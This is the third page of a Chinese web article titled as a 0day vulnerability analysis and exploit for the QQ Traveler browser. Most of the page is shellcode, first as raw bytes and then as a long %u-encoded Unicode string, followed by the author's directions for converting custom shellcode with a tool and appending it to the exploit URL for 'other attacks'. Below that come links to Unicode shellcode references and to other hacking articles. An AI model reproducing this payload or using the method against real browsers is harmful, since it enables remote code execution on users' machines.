QQ Traveler漏洞分析与利用(0day)(3)

原作者:admin 添加时间:2007-05-19 原文发表:2007-05-19 人气:67

本文章共3772字，分3页，当前第3页，快速翻页：

-----------------------------------------------------------------------------------------------------------------------------------------------

本文提示：《QQ Traveler漏洞分析与利用(0day)(3)》是本站编辑们为广大网友精选的实用文章，本文阐述了关于文章的相关理论，相对来说专业性强，但是本文只是针对于某个问题提出的见解与论述，未必能辐射到相关问题的方方面面，所以本文处理问题的方法仅仅为您提供一些参考。更多问题请查阅学习中国网其他栏目哦.

-----------------------------------------------------------------------------------------------------------------------------------------------

"\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50\x53"
"\xFF\x57\xFC\x53\xFF\x57\xF8";
写成unicode的形式如下：（每两个字节进行首字节与尾字节颠倒即可）
%u6A68%u380A%u681E%u8963%u4FD1%u3268%u9174%u8B0C%u8DF4%uF47E%uDB33%u04B7%uE32B%uBB66%u3233%u6853%u7375%u7265%u3354%u64D2%u5A8B%u8B30%u0C4B%u498B%u8B1C%u8B09%u0869%u3DAD%u0A6A%u1E38%u0575%uFF95%uF857%u6095%u458B%u8B3C%u054C%u0378%u8BCD%u2059%uDD03%uFF33%u8B47%uBB34%uF503%u0F99%u06BE%uC43A%u0874%uCAC1%u0307%u46D0%uF1EB%u543B%u1C24%uE475%u598B%u0324%u66DD%u3C8B%u8B7B%u1C59%uDD03%u2C03%u95BB%uAB5F%u6157%u6A3D%u380A%u751E%u33A9%u53DB%u7768%u7365%u6874%u6166%u6C69%uC48B%u5053%u5350%u57FF%u53FC%u57FF
从shellcode到unicode的转换，我已经写好了工具，运行一下那个程序，就可以把同目录下的sc.txt(不含“\x”的shellcode字符文件)转换成unicode的形式，生成unicode.txt文件！
如要进行其他攻击，请先写好支持Unicode的shellcode，然后用我的工具，转换成unicode形式，并把unicode形式的 shellcode追加到上面的URL中蠀緑后即可。具体支持unicode 的shellcode的编写，请参考以下链接：
Unicode编码表：
http://www.wiki.cn/wiki/Unicode%E7%BC%96%E7%A0%81%E8%A1%A8/0000-0FFF
Unicode shellcode：
http://arhiva.elitesecurity.org/t80431-Unicode-shellcode
《Creating Arbitrary Shellcode In Unicode Expanded Strings》
http://www.nextgenss.com/papers/unicodebo.pdf

本文章更多内容：<<上一页 - 1 - 2 - 3

本页地址

收藏到：[收藏夹] [百度搜藏] [新浪ViVi] [POCO网摘] [ 和讯网摘] [好哦网摘] [Google书签]
[Yahoo书签] [搜狐网摘] [365Key网摘] [天极网摘] [我摘] [博采网摘] [igooi网摘]

• 如何在Windows 2003中得到登陆密码

• vbs实现sql注入

• 一种新的穿透防火墙的数据传输技术

• 看看黑客如何破解MS SQL SERCVER密码

• 黑客案例——浏览器执行exe文件的探讨